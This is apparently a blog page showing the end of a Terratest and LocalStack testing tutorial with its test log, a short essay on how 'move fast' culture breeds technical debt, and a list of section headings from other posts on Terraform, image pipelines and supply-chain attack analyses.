TestS3BucketWithLocalStack 2025-08-15T12:19:35-04:00 retry.go:91: terraform [destroy -auto-approve -input=false -lock=false]
TestS3BucketWithLocalStack 2025-08-15T12:19:35-04:00 logger.go:67: Running command terraform with args [destroy -auto-approve -input=false -lock=false]
TestS3BucketWithLocalStack 2025-08-15T12:19:38-04:00 logger.go:67: Plan: 0 to add, 0 to change, 1 to destroy.
TestS3BucketWithLocalStack 2025-08-15T12:19:39-04:00 logger.go:67: aws_s3_bucket.example: Destroying... [id=my-tf-test-bucket]
TestS3BucketWithLocalStack 2025-08-15T12:19:39-04:00 logger.go:67: aws_s3_bucket.example: Destruction complete after 0s

--- PASS: TestS3BucketWithLocalStack (10.83s)


I hope this gives you a solid foundation for testing your Terraform modules with the TerraStack. By leveraging LocalStack and Terratest, you can create fast, reliable tests that run locally or in CI/CD pipelines without the overhead of managing real AWS resources. This approach not only speeds up your development cycle but also gives you confidence that your IaC works as intended before it hits production. Happy testing! If you’re interested in more of my work, check out my GitHub.


Rushing Toward Rewrite
2025-03-26T00:00:00+00:00
This is part three of my microblog series exploring the subtle dysfunctions that plague engineering organizations. After discussing over-abstraction as a liability and unpacking how excessive toil kills engineering teams, this post tackles a nuanced threat: when “moving fast” becomes a cultural shortcut for cutting corners.

Move Fast and Don’t Break Everything

A former CEO of mine used to say: “Be fast or be perfect. And since no one’s perfect, you better be fast.” Sounds cool until that motto becomes a shield to skip due diligence, code reviews, and even basic security hygiene. Speed wasn’t a value—it was an excuse. PRs rushed. On-call flaring. Postmortems piling. And still, engineers asking for admin access “to move fast.”

Spoiler: they didn’t need it.

The deeper problem? We weren’t a scrappy startup anymore—we were operating at enterprise scale with a startup mindset. The cost of speed was technical debt, fragility, and a long tail of rework. When I transitioned to a new role (back in startup mode) I heard the same “move fast” mantra. But this time, it hit differently. Because here’s the truth: moving fast is possible without setting your future self on fire.

Here’s what I’ve learned:

1. Fail fast—but fail forward. Don’t just throw things at prod and hope they stick. Structure your failures. If a solution’s not viable, surface that early with data and a path forward. Good failure leaves breadcrumbs for the next iteration.

2. Build for iteration. Forget perfect. Aim for clear next steps. Your v1 should be designed with a roadmap in mind. Where will this evolve? What trade-offs are you making? Ship it—but know how you’ll ship it better.

3. Stay modular. Design with exits. If your observability pipeline starts with a pricey SaaS, fine. But make it swappable. Keep your vendor coupling thin so you can self-host later without a complete rewrite.

4. Be honest about scale. What worked for a team of 10 won’t work at 100. “Move fast” looks different when customers depend on your uptime. Match your velocity with the blast radius of your decisions.

We glamorize speed, but the smartest teams know when to slow down, breathe, and make thoughtful decisions that stand the test of time. Move fast—but don’t break the foundation.

rosecurity@cloud

Building an AWS Image Factory with Packer and Terratest

Scaffolding

AWS Prerequisites

Codebase Structure

Building the Image

Build Pipelines

Testing and Scanning AMIs

Tagging and Sharing Images

Tradeoffs and Unknowns

Wrapping Up

Welcome to Transitive Dependency Hell

Monday Night

The Hijack

The Postinstall Chain

Not Just Macs

What CrowdStrike Caught (and Didn’t)

IOCs

Takeaways

SHA Pinning Is Not Enough

Quick Refresher

What Actually Happened

Nobody Reads Hex Strings

The Comment That Lied

What Actually Helps

This Is the Floor, Not the Ceiling

How a Typosquatted Domain and a Fake Version Tag Turned Trivy Into a Credential Stealer

Two Days of Preparation

A Legitimate Version, Silently Hijacked

Walking Through the Malicious Code

Phase 1: Harvesting Runner Process Environments

Phase 2: The Fork

Phase 3: Encrypt and Exfiltrate

Phase 4: Phone Home (with a Backup Plan)

It Didn’t Stop at CI

The Tell

The Cleanup

Takeaways

Terraform Drift Detection Powered by GitHub Actions

The Problem

The Simplicity of GitHub Actions

The Workflow

Triggers and Permissions

Finding Root Modules

Credential Configuration and Setup

Detecting Drift

Creating and Updating GitHub Issues

Key Benefits

Considerations for Production Use

Terraform Tips from the IaC Trenches

Use one() for Safer Conditional Resource References

The Problem

The Solution

Design Better Module Variables with Objects, optional(), and coalesce()

The Problem: Scattered Variables

The Solution: Group Related Variables into Objects

HEREDOC Syntax for Documentation

Smart Defaults with coalesce() and Context

Avoid Double Negatives in Variable Names

The Problem

The Solution

KISS vs DRY in Infrastructure as Code: Why Simple Often Beats Clever

The Scale Gap Problem

The DRY Revolution: Solving Yesterday’s Problems

The Hidden Costs of Going DRY

When Abstractions Break, Troubleshooting Becomes Archaeological

The Onboarding Cliff

Ecosystem Lock-in: The Hidden Technical Debt

The KISS Alternative: Orchestration in Pipelines, Simplicity in Code

The Core Insight: Complexity Can Only Be Relocated

The Repo Structure: Nested and Navigable

Yes, Backend Configs Repeat (And That’s Actually a Feature)

Orchestration Lives in Pipelines

Addressing the Objections

“But You’re Repeating Backend Configurations!”

“You Don’t Have Hierarchical Inheritance!”

“This Won’t Scale!”

When to Use What: The Nuanced Reality

KISS Makes Sense When:

DRY Tooling Makes Sense When:

Use `one()` for Safer Conditional Resource References

Design Better Module Variables with Objects, `optional()`, and `coalesce()`

Smart Defaults with `coalesce()` and Context